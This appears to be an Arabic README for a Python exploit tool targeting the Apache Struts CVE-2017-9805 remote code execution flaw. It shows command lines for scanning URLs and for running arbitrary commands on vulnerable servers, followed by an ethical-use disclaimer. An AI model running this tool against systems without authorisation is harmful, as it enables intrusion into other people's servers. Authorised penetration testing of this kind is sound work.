
أداة استغلال لـ Apache Struts CVE-2017-9805
python apache-struts-pwn.py --url 'http://example.com/struts2-rest-showcase/orders/3'
python apache-struts-pwn.py --list 'urls.txt'
python apache-struts-pwn.py --exploit --url 'http://example.com/struts2-showcase/index.action' -c 'echo test > /tmp/apache-struts-pwn'
python apache-struts-pwn.py --exploit --list 'urls.txt' -c 'echo test > /tmp/apache-struts-pwn'
هذا المشروع أُنشئ لأغراض تعليمية واختبارات أخلاقية فقط. استخدام struts-pwn لاستهداف أنظمة دون موافقة مسبقة من الطرفين يُعد غير قانوني. تقع مسؤولية الالتزام بجميع القوانين المحلية والولائية والاتحادية المعمول بها على عاتق المستخدم النهائي. لا يتحمل المطوّرون أي مسؤولية ولا يُعتبرون مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.
المشروع مرخّص بموجب رخصة MIT.
مازن أحمد